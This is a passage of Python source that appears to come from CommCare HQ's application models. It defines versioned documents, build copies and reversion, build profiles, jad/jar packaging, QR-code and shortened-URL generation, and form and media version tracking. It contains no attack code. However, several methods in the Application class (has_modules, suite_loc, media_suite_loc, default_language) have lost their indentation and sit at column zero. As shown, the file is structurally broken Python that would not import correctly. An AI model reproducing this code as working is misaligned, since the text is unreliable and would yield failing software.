                    # django cache will pickle this exception for you
                    # but e.response isn't picklable
                    if hasattr(e, 'response'):
                        del e.response
                    content = e
                    # cache the miss briefly so repeated lookups stay cheap
                    self.__set_cached_attachment(name, content, timeout=60*5)
                    raise
                else:
                    self.__set_cached_attachment(name, content)
        if isinstance(content, ResourceNotFound):
            # a cached miss from an earlier request
            raise content
        return content
    def lazy_list_attachments(self):
        # union of not-yet-saved lazy attachments and persisted blobs
        keys = set()
        keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
        keys.update(self.blobs or {})
        return keys
    def save(self, **params):
        """Save the doc, committing queued lazy attachments atomically first."""
        def super_save():
            super(LazyBlobDoc, self).save(**params)
        if self._LAZY_ATTACHMENTS:
            with self.atomic_blobs(super_save):
                for name, info in self._LAZY_ATTACHMENTS.items():
                    if not info['content_type']:
                        info['content_type'] = ';'.join(filter(None, guess_type(name)))
                    super(LazyBlobDoc, self).put_attachment(name=name, **info)
            # super_save() has succeeded by now
            for name, info in self._LAZY_ATTACHMENTS.items():
                self.__set_cached_attachment(name, info['content'])
            self._LAZY_ATTACHMENTS.clear()
        else:
            super_save()
class VersionedDoc(LazyBlobDoc):
    """
    A document that keeps an auto-incrementing version number, knows how to make copies of itself,
    delete a copy of itself, and revert back to an earlier copy of itself.
    """
    domain = StringProperty()
    # _id of the doc this one was copied (built) from; None for working copies
    copy_of = StringProperty()
    version = IntegerProperty()
    short_url = StringProperty()
    short_odk_url = StringProperty()
    short_odk_media_url = StringProperty()
    # fields stripped from exported sources (see export_json / from_source)
    _meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']
    @property
    def id(self):
        return self._id
    @property
    def master_id(self):
        """Return the ID of the 'master' app. For app builds this is the ID
        of the app they were built from otherwise it's just the app's ID."""
        return self.copy_of or self._id
    def save(self, response_json=None, increment_version=None, **params):
        """Save, bumping `version` for working copies.

        By default builds (copy_of set) and LinkedApplication docs do not
        auto-increment. When `response_json` is given, the new version is
        reported under response_json['update']['app-version'].
        """
        if increment_version is None:
            increment_version = not self.copy_of and self.doc_type != 'LinkedApplication'
        if increment_version:
            self.version = self.version + 1 if self.version else 1
        super(VersionedDoc, self).save(**params)
        if response_json is not None:
            if 'update' not in response_json:
                response_json['update'] = {}
            response_json['update']['app-version'] = self.version
    def make_build(self):
        """Return a build copy of this doc (copy_of=self._id), reusing an
        existing build of the same version when one is found in couch."""
        assert self.get_id
        assert self.copy_of is None
        cls = self.__class__
        copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
        if copies:
            copy = copies[0]
        else:
            copy = deepcopy(self.to_json())
            # never carry these over into a fresh build document
            bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
                        'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')
            for bad_key in bad_keys:
                if bad_key in copy:
                    del copy[bad_key]
            copy = cls.wrap(copy)
            copy['copy_of'] = self._id
            copy.copy_attachments(self)
        return copy
    def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
        # regexp=None copies everything; otherwise only matching names
        for name in other.lazy_list_attachments() or {}:
            if regexp is None or re.match(regexp, name):
                self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)
    def make_reversion_to_copy(self, copy):
        """
        Replaces couch doc with a copy of the backup ("copy").
        Returns another Application/RemoteApp referring to this
        updated couch doc. The returned doc should be used in place of
        the original doc, i.e. should be called as follows:
            app = app.make_reversion_to_copy(copy)
            app.save()
        """
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        app = deepcopy(copy.to_json())
        # keep this doc's identity and version; it is no longer a build
        app['_rev'] = self._rev
        app['_id'] = self._id
        app['version'] = self.version
        app['copy_of'] = None
        app.pop('_attachments', None)
        app.pop('external_blobs', None)
        cls = self.__class__
        app = cls.wrap(app)
        app.copy_attachments(copy)
        return app
    def delete_copy(self, copy):
        """Soft-delete a build of this app."""
        if copy.copy_of != self._id:
            raise VersioningError("%s is not a copy of %s" % (copy, self))
        copy.delete_app()
        # persist the doc_type change without bumping the version
        copy.save(increment_version=False)
    def scrub_source(self, source):
        """
        To be overridden.
        Use this to scrub out anything
        that shouldn't be shown in the
        application source, such as ids, etc.
        """
        return source
    def export_json(self, dump_json=True):
        """Serialize this doc (minus meta fields) for export/import."""
        source = deepcopy(self.to_json())
        for field in self._meta_fields:
            if field in source:
                del source[field]
        _attachments = self.get_attachments()
        # the '_attachments' value is a dict of `name: blob_content`
        # pairs, and is part of the exported (serialized) app interface
        source['_attachments'] = _attachments
        source.pop("external_blobs", None)
        source = self.scrub_source(source)
        return json.dumps(source) if dump_json else source
    def get_attachments(self):
        attachments = {}
        for name in self.lazy_list_attachments():
            if re.match(ATTACHMENT_REGEX, name):
                # FIXME loss of metadata (content type, etc.)
                attachments[name] = self.lazy_fetch_attachment(name)
        return attachments
    def save_attachments(self, attachments, save=None):
        with self.atomic_blobs(save=save):
            for name, attachment in attachments.items():
                if re.match(ATTACHMENT_REGEX, name):
                    self.put_attachment(attachment, name)
        return self
    @classmethod
    def from_source(cls, source, domain):
        """Inverse of export_json: wrap exported source into a new doc."""
        for field in cls._meta_fields:
            if field in source:
                del source[field]
        source['domain'] = domain
        app = cls.wrap(source)
        return app
    def is_deleted(self):
        return self.doc_type.endswith(DELETED_SUFFIX)
    def unretire(self):
        # restore a soft-deleted doc by stripping the deleted suffix
        self.doc_type = self.get_doc_type()
        self.save()
    def get_doc_type(self):
        """The doc_type without any deleted suffix."""
        if self.doc_type.endswith(DELETED_SUFFIX):
            return self.doc_type[:-len(DELETED_SUFFIX)]
        else:
            return self.doc_type
def absolute_url_property(method):
    """
    Helper for the various fully qualified application URLs
    Turns a method returning an unqualified URL
    into a property returning a fully qualified URL
    (e.g., '/my_url/' => 'https://www.commcarehq.org/my_url/')
    Expects `self.url_base` to be fully qualified url base
    """
    @wraps(method)
    def _fully_qualified(self):
        return "{}{}".format(self.url_base, method(self))
    return property(_fully_qualified)
class BuildProfile(DocumentSchema):
    # human-readable label; not part of the equality comparison
    name = StringProperty()
    # languages included in builds made with this profile
    langs = StringListProperty()
    practice_mobile_worker_id = StringProperty()
    def __eq__(self, other):
        """Content equality on langs + practice worker id.

        ``name`` is not compared (matches the original behavior — confirm
        before changing). Comparing against a non-BuildProfile now returns
        NotImplemented instead of raising AttributeError when the other
        object lacks these attributes.
        """
        if not isinstance(other, BuildProfile):
            return NotImplemented
        return self.langs == other.langs and self.practice_mobile_worker_id == other.practice_mobile_worker_id
    def __ne__(self, other):
        # delegate to __eq__, propagating NotImplemented instead of
        # negating it (bool(NotImplemented) is an error on modern Python)
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result
class ApplicationBase(VersionedDoc, SnapshotMixin,
                      CommCareFeatureSupportMixin,
                      CommentMixin):
    """
    Abstract base class for Application and RemoteApp.
    Contains methods for generating the various files and zipping them into CommCare.jar
    See note at top of file for high-level overview.
    """
    _blobdb_type_code = CODES.application
    recipients = StringProperty(default="")
    # this is the supported way of specifying which commcare build to use
    build_spec = SchemaProperty(BuildSpec)
    platform = StringProperty(
        choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
        default="nokia/s40"
    )
    text_input = StringProperty(
        choices=['roman', 'native', 'custom-keys', 'qwerty'],
        default="roman"
    )
    # The following properties should only appear on saved builds
    # built_with stores a record of CommCare build used in a saved app
    built_with = SchemaProperty(BuildRecord)
    build_signed = BooleanProperty(default=True)
    built_on = DateTimeProperty(required=False)
    build_comment = StringProperty()
    comment_from = StringProperty()
    build_broken = BooleanProperty(default=False)
    is_auto_generated = BooleanProperty(default=False)
    # not used yet, but nice for tagging/debugging
    # currently only canonical value is 'incomplete-build',
    # for when build resources aren't found where they should be
    build_broken_reason = StringProperty()
    # watch out for a past bug:
    # when reverting to a build that happens to be released
    # that got copied into into the new app doc, and when new releases were made,
    # they were automatically starred
    # AFAIK this is fixed in code, but it may rear its ugly head in an as-yet-not-understood
    # way for apps that already had this problem. Just keep an eye out
    is_released = BooleanProperty(default=False)
    # django-style salted hash of the admin password
    admin_password = StringProperty()
    # a=Alphanumeric, n=Numeric, x=Neither (not allowed)
    admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')
    langs = StringListProperty()
    secure_submissions = BooleanProperty(default=False)
    # metadata for data platform
    amplifies_workers = StringProperty(
        choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
        default=AMPLIFIES_NOT_SET
    )
    amplifies_project = StringProperty(
        choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
        default=AMPLIFIES_NOT_SET
    )
    minimum_use_threshold = StringProperty(
        default='15'
    )
    experienced_threshold = StringProperty(
        default='3'
    )
    # exchange properties
    cached_properties = DictProperty()
    description = StringProperty()
    deployment_date = DateTimeProperty()
    phone_model = StringProperty()
    user_type = StringProperty()
    attribution_notes = StringProperty()
    # always false for RemoteApp
    case_sharing = BooleanProperty(default=False)
    vellum_case_management = BooleanProperty(default=True)
    # legacy property; kept around to be able to identify (deprecated) v1 apps
    application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
    last_modified = DateTimeProperty()
    def assert_app_v2(self):
        assert self.application_version == APP_V2
    build_profiles = SchemaDictProperty(BuildProfile)
    practice_mobile_worker_id = StringProperty()
    use_j2me_endpoint = BooleanProperty(default=False)
    target_commcare_flavor = StringProperty(
        default='none',
        choices=['none', TARGET_COMMCARE, TARGET_COMMCARE_LTS]
    )
    # Whether or not the Application has had any forms submitted against it
    has_submissions = BooleanProperty(default=False)
    # domains that are allowed to have linked apps with this master
    linked_whitelist = StringListProperty()
    mobile_ucr_restore_version = StringProperty(
        default=MOBILE_UCR_VERSION_1, choices=MOBILE_UCR_VERSIONS, required=False
    )
    location_fixture_restore = StringProperty(
        default=DEFAULT_LOCATION_FIXTURE_OPTION, choices=LOCATION_FIXTURE_OPTIONS,
        required=False
    )
    @staticmethod
    def _scrap_old_conventions(data):
        """Migrate legacy document fields in place.

        Returns True when the migration changed the doc in a way that
        should be persisted immediately (see wrap()).
        """
        should_save = False
        # scrape for old conventions and get rid of them
        if 'commcare_build' in data:
            version, build_number = data['commcare_build'].split('/')
            data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
            del data['commcare_build']
        if 'commcare_tag' in data:
            version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
            data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
            del data['commcare_tag']
        if "built_with" in data and isinstance(data['built_with'], six.string_types):
            soft_assert_type_text(data['built_with'])
            data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
        if 'native_input' in data:
            if 'text_input' not in data:
                data['text_input'] = 'native' if data['native_input'] else 'roman'
            del data['native_input']
        if 'build_langs' in data:
            if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
                data['build_profiles'] = {
                    uuid.uuid4().hex: dict(
                        name=', '.join(data['build_langs']),
                        langs=data['build_langs']
                    )
                }
                should_save = True
            del data['build_langs']
        if 'original_doc' in data:
            data['copy_history'] = [data.pop('original_doc')]
            should_save = True
        return should_save
    @classmethod
    def wrap(cls, data, scrap_old_conventions=True):
        if scrap_old_conventions:
            should_save = cls._scrap_old_conventions(data)
        data["description"] = data.get('description') or data.get('short_description')
        self = super(ApplicationBase, cls).wrap(data)
        if not self.build_spec or self.build_spec.is_null():
            self.build_spec = get_default_build_spec()
        if scrap_old_conventions and should_save:
            # persist migrations of old conventions right away
            self.save()
        return self
    @property
    @memoized
    def global_app_config(self):
        return GlobalAppConfig.for_app(self)
    def rename_lang(self, old_lang, new_lang):
        # subclasses do the real renaming; the base class only validates
        validate_lang(new_lang)
    def is_remote_app(self):
        return False
    @memoized
    def get_previous_version(self):
        """The most recent saved build of this app (couch view, descending)."""
        return self.view('app_manager/applications',
            startkey=[self.domain, self.master_id, {}],
            endkey=[self.domain, self.master_id],
            include_docs=True,
            limit=1,
            descending=True,
        ).first()
    @memoized
    def get_latest_saved(self):
        """
        This looks really similar to get_latest_app, not sure why tim added
        """
        doc = (get_latest_released_app_doc(self.domain, self._id) or
               get_latest_build_doc(self.domain, self._id))
        return self.__class__.wrap(doc) if doc else None
    def set_admin_password(self, raw_password):
        """Store a salted hash of the admin password and record its charset."""
        from binascii import hexlify
        # bytes.encode('hex') only existed on Python 2; hexlify works on 2 and 3
        salt = hexlify(os.urandom(5)).decode('ascii')
        self.admin_password = make_password(raw_password, salt=salt)
        if raw_password.isnumeric():
            self.admin_password_charset = 'n'
        elif raw_password.isalnum():
            self.admin_password_charset = 'a'
        else:
            self.admin_password_charset = 'x'
    def get_build(self):
        return self.build_spec.get_build()
    @property
    def build_version(self):
        # `LooseVersion`s are smart!
        # LooseVersion('2.12.0') > '2.2'
        # (even though '2.12.0' < '2.2')
        if self.build_spec.version:
            return LooseVersion(self.build_spec.version)
    @property
    def commcare_minor_release(self):
        """This is mostly just for views"""
        return '%d.%d' % self.build_spec.minor_release()
    @property
    def short_name(self):
        # truncate long names for display
        return self.name if len(self.name) <= 12 else '%s..' % self.name[:10]
    @property
    def url_base(self):
        custom_base_url = getattr(self, 'custom_base_url', None)
        return custom_base_url or get_url_base()
    @absolute_url_property
    def post_url(self):
        if self.secure_submissions:
            url_name = 'receiver_secure_post_with_app_id'
        else:
            url_name = 'receiver_post_with_app_id'
        return reverse(url_name, args=[self.domain, self.get_id])
    @absolute_url_property
    def key_server_url(self):
        return reverse('key_server_url', args=[self.domain])
    @absolute_url_property
    def heartbeat_url(self):
        return reverse('phone_heartbeat', args=[self.domain, self.get_id])
    @absolute_url_property
    def ota_restore_url(self):
        return reverse('app_aware_restore', args=[self.domain, self._id])
    @absolute_url_property
    def form_record_url(self):
        return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
    @absolute_url_property
    def hq_profile_url(self):
        # RemoteApp already has a property called "profile_url",
        # Application.profile_url just points here to stop the conflict
        # http://manage.dimagi.com/default.asp?227088#1149422
        return "%s?latest=true" % (
            reverse('download_profile', args=[self.domain, self._id])
        )
    @absolute_url_property
    def media_profile_url(self):
        return "%s?latest=true" % (
            reverse('download_media_profile', args=[self.domain, self._id])
        )
    @property
    def profile_loc(self):
        return "jr://resource/profile.xml"
    @absolute_url_property
    def jar_url(self):
        return reverse('download_jar', args=[self.domain, self._id])
    @absolute_url_property
    def recovery_measures_url(self):
        return reverse('recovery_measures', args=[self.domain, self._id])
    def get_jar_path(self):
        """Map platform and text_input settings to the j2me build artifact path."""
        spec = {
            'nokia/s40': 'Nokia/S40',
            'nokia/s60': 'Nokia/S60',
            'generic': 'Generic/Default',
            'winmo': 'Native/WinMo'
        }[self.platform]
        if self.platform in ('nokia/s40', 'nokia/s60'):
            spec += {
                ('native',): '-native-input',
                ('roman',): '-generic',
                ('custom-keys',): '-custom-keys',
                ('qwerty',): '-qwerty'
            }[(self.text_input,)]
        return spec
    def get_jadjar(self):
        return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)
    def validate_jar_path(self):
        """Raise AppEditingError when text_input isn't supported by the build."""
        build = self.get_build()
        setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
        value = self.text_input
        setting_version = setting['since'].get(value)
        if setting_version:
            setting_version = tuple(map(int, setting_version.split('.')))
            my_version = build.minor_release()
            if my_version < setting_version:
                i = setting['values'].index(value)
                assert i != -1
                name = _(setting['value_names'][i])
                raise AppEditingError((
                    '%s Text Input is not supported '
                    'in CommCare versions before %s.%s. '
                    '(You are using %s.%s)'
                ) % ((name,) + setting_version + my_version))
    @property
    def jad_settings(self):
        settings = {
            'JavaRosa-Admin-Password': self.admin_password,
            'Profile': self.profile_loc,
            'MIDlet-Jar-URL': self.jar_url,
            #'MIDlet-Name': self.name,
            # e.g. 2011-Apr-11 20:45
            'CommCare-Release': "true",
        }
        if not self.build_version or self.build_version < LooseVersion('2.8'):
            settings['Build-Number'] = self.version
        return settings
    def create_build_files(self, build_profile_id=None):
        # materialize every generated file as a lazy attachment under files/
        all_files = self.create_all_files(build_profile_id)
        for filepath in all_files:
            self.lazy_put_attachment(all_files[filepath],
                                     'files/%s' % filepath)
    def create_jadjar_from_build_files(self, save=False):
        """Return (jad, jar) for this build, packing them from files/ on a miss."""
        self.validate_jar_path()
        with CriticalSection(['create_jadjar_' + self._id]):
            try:
                return (
                    self.lazy_fetch_attachment('CommCare.jad'),
                    self.lazy_fetch_attachment('CommCare.jar'),
                )
            except (ResourceNotFound, KeyError):
                all_files = {
                    filename[len('files/'):]: self.lazy_fetch_attachment(filename)
                    for filename in self.blobs if filename.startswith('files/')
                }
                all_files = {
                    name: (contents if isinstance(contents, (bytes, SafeBytes)) else contents.encode('utf-8'))
                    for name, contents in all_files.items()
                }
                release_date = self.built_with.datetime or datetime.datetime.utcnow()
                jad_settings = {
                    'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
                }
                jad_settings.update(self.jad_settings)
                jadjar = self.get_jadjar().pack(all_files, jad_settings)
                if save:
                    self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
                    self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
                    self.built_with.signed = jadjar.signed
                return jadjar.jad, jadjar.jar
    @property
    @memoized
    def timing_context(self):
        return TimingContext(self.name)
    def validate_app(self):
        return ApplicationBaseValidator(self).validate_app()
    @absolute_url_property
    def odk_profile_url(self):
        return reverse('download_odk_profile', args=[self.domain, self._id])
    @absolute_url_property
    def odk_media_profile_url(self):
        return reverse('download_odk_media_profile', args=[self.domain, self._id])
    def get_odk_qr_code(self, with_media=False, build_profile_id=None, download_target_version=False):
        """Returns a QR code, as a PNG to install on CC-ODK"""
        filename = 'qrcode.png' if not download_target_version else 'qrcode-targeted.png'
        try:
            # QR codes are cached as attachments; regenerate only on a miss
            return self.lazy_fetch_attachment(filename)
        except ResourceNotFound:
            url = self.odk_profile_url if not with_media else self.odk_media_profile_url
            kwargs = []
            if build_profile_id is not None:
                kwargs.append('profile={profile_id}'.format(profile_id=build_profile_id))
            if download_target_version:
                kwargs.append('download_target_version=true')
            url += '?' + '&'.join(kwargs)
            image = qrcode.make(url)
            output = BytesIO()
            image.save(output, "PNG")
            qr_content = output.getvalue()
            self.lazy_put_attachment(qr_content, filename,
                                     content_type="image/png")
            return qr_content
    def generate_shortened_url(self, view_name, build_profile_id=None):
        """Best-effort bitly shortening.

        Returns None when BITLY_LOGIN is unconfigured or when shortening
        fails for any reason (the exception is logged, not raised).
        """
        try:
            if settings.BITLY_LOGIN:
                if build_profile_id is not None:
                    long_url = "{}{}?profile={}".format(
                        self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
                    )
                else:
                    long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))
                shortened_url = bitly.shorten(long_url)
            else:
                shortened_url = None
        except Exception:
            logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
        else:
            return shortened_url
    def get_short_url(self, build_profile_id=None):
        # the default-profile URL is cached on the doc; profile URLs are not
        if not build_profile_id:
            if not self.short_url:
                self.short_url = self.generate_shortened_url('download_jad')
                self.save()
            return self.short_url
        else:
            return self.generate_shortened_url('download_jad', build_profile_id)
    def get_short_odk_url(self, with_media=False, build_profile_id=None):
        # same caching scheme as get_short_url, split by media flavor
        if not build_profile_id:
            if with_media:
                if not self.short_odk_media_url:
                    self.short_odk_media_url = self.generate_shortened_url('download_odk_media_profile')
                    self.save()
                return self.short_odk_media_url
            else:
                if not self.short_odk_url:
                    self.short_odk_url = self.generate_shortened_url('download_odk_profile')
                    self.save()
                return self.short_odk_url
        else:
            if with_media:
                return self.generate_shortened_url('download_odk_media_profile', build_profile_id)
            else:
                return self.generate_shortened_url('download_odk_profile', build_profile_id)
    def fetch_jar(self):
        return self.get_jadjar().fetch_jar()
    @time_method()
    def make_build(self, comment=None, user_id=None):
        """Create a build copy with generated files and build metadata set."""
        copy = super(ApplicationBase, self).make_build()
        if not copy._id:
            # I expect this always to be the case
            # but check explicitly so as not to change the _id if it exists
            copy._id = uuid.uuid4().hex
        copy.create_build_files()
        # since this hard to put in a test
        # I'm putting this assert here if copy._id is ever None
        # which makes tests error
        assert copy._id
        built_on = datetime.datetime.utcnow()
        copy.date_created = built_on
        copy.built_on = built_on
        copy.built_with = BuildRecord(
            version=copy.build_spec.version,
            build_number=copy.version,
            datetime=built_on,
        )
        copy.build_comment = comment
        copy.comment_from = user_id
        copy.is_released = False
        prune_auto_generated_builds.delay(self.domain, self._id)
        return copy
    def delete_app(self):
        """Soft-delete: flag the doc_type and record an undo entry."""
        domain_has_apps.clear(self.domain)
        self.doc_type += '-Deleted'
        record = DeleteApplicationRecord(
            domain=self.domain,
            app_id=self.id,
            datetime=datetime.datetime.utcnow()
        )
        record.save()
        return record
    def save(self, response_json=None, increment_version=None, **params):
        from corehq.apps.analytics.tasks import track_workflow, send_hubspot_form, HUBSPOT_SAVED_APP_FORM_ID
        self.last_modified = datetime.datetime.utcnow()
        if not self._rev and not domain_has_apps(self.domain):
            # first app in the domain: bust the cached "has apps" flag
            domain_has_apps.clear(self.domain)
        LatestAppInfo(self.master_id, self.domain).clear_caches()
        get_all_case_properties.clear(self)
        get_usercase_properties.clear(self)
        request = view_utils.get_request()
        user = getattr(request, 'couch_user', None)
        if user and user.days_since_created == 0:
            track_workflow(user.get_email(), 'Saved the App Builder within first 24 hours')
            send_hubspot_form(HUBSPOT_SAVED_APP_FORM_ID, request)
        super(ApplicationBase, self).save(
            response_json=response_json, increment_version=increment_version, **params)
    @classmethod
    def save_docs(cls, docs, **kwargs):
        utcnow = datetime.datetime.utcnow()
        for doc in docs:
            doc['last_modified'] = utcnow
        super(ApplicationBase, cls).save_docs(docs, **kwargs)
    bulk_save = save_docs
    def set_form_versions(self):
        # by default doing nothing here is fine.
        pass
    def set_media_versions(self):
        pass
    def get_build_langs(self, build_profile_id=None):
        if build_profile_id is not None:
            return self.build_profiles[build_profile_id].langs
        else:
            return self.langs
def validate_lang(lang):
    """Raise ValueError unless *lang* is a 2-3 letter lowercase language code,
    optionally followed by a lowercase hyphenated subtag (e.g. 'en', 'en-gb')."""
    pattern = re.compile(r'^[a-z]{2,3}(-[a-z]*)?$')
    if pattern.match(lang) is None:
        raise ValueError("Invalid Language")
class SavedAppBuild(ApplicationBase):
    """An ApplicationBase variant used when listing saved builds."""
    def releases_list_json(self, timezone):
        """
        returns minimum possible data that could be used to list a Build on releases page on HQ
        :param timezone: timezone expected for timestamps in result
        :return: data dict
        """
        data = super(SavedAppBuild, self).to_json().copy()
        # ignore details that are not used
        for key in ('modules', 'user_registration', 'external_blobs',
                    '_attachments', 'profile', 'translations',
                    'description', 'short_description', 'multimedia_map', 'media_language_map'):
            data.pop(key, None)
        # convert the server-side UTC timestamp into the requested timezone
        built_on_user_time = ServerTime(self.built_on).user_time(timezone)
        data.update({
            'id': self.id,
            'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
            'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
            'menu_item_label': self.built_with.get_menu_item_label(),
            'jar_path': self.get_jar_path(),
            'short_name': self.short_name,
            'enable_offline_install': self.enable_offline_install,
        })
        comment_from = data['comment_from']
        if comment_from:
            # show a readable name instead of the raw user id when possible
            data['comment_user_name'] = get_display_name_for_user_id(
                self.domain, comment_from, default=comment_from)
        return data
class Application(ApplicationBase, TranslationMixin, ApplicationMediaMixin,
                  ApplicationIntegrationMixin):
    """
    An Application that can be created entirely through the online interface
    """
    modules = SchemaListProperty(ModuleBase)
    name = StringProperty()
    # profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
    # ended up not using a schema because properties is a reserved word
    profile = DictProperty()
    use_custom_suite = BooleanProperty(default=False)
    custom_base_url = StringProperty()
    cloudcare_enabled = BooleanProperty(default=False)
    translation_strategy = StringProperty(default='select-known',
                                          choices=list(app_strings.CHOICES.keys()))
    auto_gps_capture = BooleanProperty(default=False)
    date_created = DateTimeProperty()
    created_from_template = StringProperty()
    use_grid_menus = BooleanProperty(default=False)
    # whether form (as opposed to module) menus render as a grid
    grid_form_menus = StringProperty(default='none',
                                     choices=['none', 'all', 'some'])
    add_ons = DictProperty()
    smart_lang_display = BooleanProperty()  # null means none set so don't default to false/true
def has_modules(self):
return len(self.modules) > 0 and not self.is_remote_app()
    @property
    @memoized
    def commtrack_enabled(self):
        """Whether the app's domain has CommTrack enabled (False in unit tests)."""
        if settings.UNIT_TESTING:
            return False  # override with .tests.util.commtrack_enabled
        domain_obj = Domain.get_by_name(self.domain) if self.domain else None
        return domain_obj.commtrack_enabled if domain_obj else False
    @classmethod
    def wrap(cls, data):
        """Wrap couch data, dropping legacy fields and normalizing forms/media."""
        data.pop('commtrack_enabled', None)  # Remove me after migrating apps
        # drop modules of the removed CareplanModule doc type
        data['modules'] = [module for module in data.get('modules', [])
                           if module.get('doc_type') != 'CareplanModule']
        self = super(Application, cls).wrap(data)
        # make sure all form versions are None on working copies
        if not self.copy_of:
            for form in self.get_forms():
                form.version = None
        # weird edge case where multimedia_map gets set to null and causes issues
        if self.multimedia_map is None:
            self.multimedia_map = {}
        return self
    def save(self, *args, **kwargs):
        """Save, then invalidate cached form analytics and fire app_post_save."""
        super(Application, self).save(*args, **kwargs)
        # Import loop if this is imported at the top
        # TODO: revamp so signal_connections <- models <- signals
        from corehq.apps.app_manager import signals
        from couchforms.analytics import get_form_analytics_metadata
        for xmlns in self.get_xmlns_map():
            get_form_analytics_metadata.clear(self.domain, self._id, xmlns)
        signals.app_post_save.send(Application, application=self)
    def make_reversion_to_copy(self, copy):
        """Revert to `copy`, clearing per-form caches/versions and the broken flag."""
        app = super(Application, self).make_reversion_to_copy(copy)
        for form in app.get_forms():
            # reset the form's validation cache, since the form content is
            # likely to have changed in the revert!
            form.clear_validation_cache()
            form.version = None
        app.build_broken = False
        return app
    @property
    def profile_url(self):
        # alias for ApplicationBase.hq_profile_url (named to avoid clashing
        # with RemoteApp's own "profile_url")
        return self.hq_profile_url
    @absolute_url_property
    def suite_url(self):
        """Fully qualified download URL for suite.xml."""
        return reverse('download_suite', args=[self.domain, self.get_id])
@property
def suite_loc(self):
if self.enable_relative_suite_path:
return './suite.xml'
else:
return "jr://resource/suite.xml"
    @absolute_url_property
    def media_suite_url(self):
        """Fully qualified download URL for media_suite.xml."""
        return reverse('download_media_suite', args=[self.domain, self.get_id])
@property
def media_suite_loc(self):
if self.enable_relative_suite_path:
return "./media_suite.xml"
else:
return "jr://resource/media_suite.xml"
@property
def default_language(self):
return self.langs[0] if len(self.langs) > 0 else "en"
    def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
        """Render a form's XForm XML; pass `form` directly or locate it by ids."""
        if not form:
            form = self.get_module(module_id).get_form(form_id)
        return form.validate_form().render_xform(build_profile_id)
    def set_form_versions(self):
        """
        Set the 'version' property on each form as follows to the current app version if the form is new
        or has changed since the last build. Otherwise set it to the version from the last build.
        """
        def _hash(val):
            # fingerprint of the rendered xform bytes
            return hashlib.md5(val).hexdigest()
        previous_version = self.get_previous_version()
        if previous_version:
            # a change to build profiles affects every generated form
            force_new_version = self.build_profiles != previous_version.build_profiles
            for form_stuff in self.get_forms(bare=False):
                filename = 'files/%s' % self.get_form_filename(**form_stuff)
                form = form_stuff["form"]
                if not force_new_version:
                    try:
                        previous_form = previous_version.get_form(form.unique_id)
                        # take the previous version's compiled form as-is
                        # (generation code may have changed since last build)
                        previous_source = previous_version.fetch_attachment(filename, return_bytes=True)
                    except (ResourceNotFound, FormNotFoundException):
                        form.version = None
                    else:
                        previous_hash = _hash(previous_source)
                        # hack - temporarily set my version to the previous version
                        # so that that's not treated as the diff
                        previous_form_version = previous_form.get_version()
                        form.version = previous_form_version
                        my_hash = _hash(self.fetch_xform(form=form))
                        if previous_hash != my_hash:
                            form.version = None
                else:
                    form.version = None
    def set_media_versions(self):
        """
        Set the media version numbers for all media in the app to the current app version
        if the media is new or has changed since the last build. Otherwise set it to the
        version from the last build.
        """
        # access to .multimedia_map is slow
        previous_version = self.get_previous_version()
        prev_multimedia_map = previous_version.multimedia_map if previous_version else {}

        for path, map_item in six.iteritems(self.multimedia_map):
            prev_map_item = prev_multimedia_map.get(path, None)
            if prev_map_item and prev_map_item.unique_id:
                # Re-use the id so CommCare knows it's the same resource
                map_item.unique_id = prev_map_item.unique_id
            if (prev_map_item and prev_map_item.version
                    and prev_map_item.multimedia_id == map_item.multimedia_id):
                # unchanged media: keep the version from the last build
                map_item.version = prev_map_item.version
            else:
                # new or replaced media: stamp with the current app version
                map_item.version = self.version
    def ensure_module_unique_ids(self, should_save=False):
        """
        Creates unique_ids for modules that don't have unique_id attributes
        should_save: the doc will be saved only if should_save is set to True

        WARNING: If called on the same doc in different requests without saving,
        this function will set different uuid each time,
        likely causing unexpected behavior
        """
        if any(not mod.unique_id for mod in self.modules):
            for mod in self.modules:
                # no-op for modules that already have an id
                mod.get_or_create_unique_id()
            if should_save:
                self.save()
    def create_app_strings(self, lang, build_profile_id=None):
        """Render the app-strings text for one language; 'default' selects the
        strategy's default-strings generator."""
        gen = app_strings.CHOICES[self.translation_strategy]
        if lang == 'default':
            return gen.create_default_app_strings(self, build_profile_id)
        else:
            return gen.create_app_strings(self, lang)

    @property
    def skip_validation(self):
        # profile property controlling content validation; defaults to 'yes'
        properties = (self.profile or {}).get('properties', {})
        return properties.get('cc-content-valid', 'yes')

    @property
    def jad_settings(self):
        """Base jad settings plus this app's Skip-Validation flag."""
        s = super(Application, self).jad_settings
        s.update({
            'Skip-Validation': self.skip_validation,
        })
        return s
    @time_method()
    def create_profile(self, is_odk=False, with_media=False,
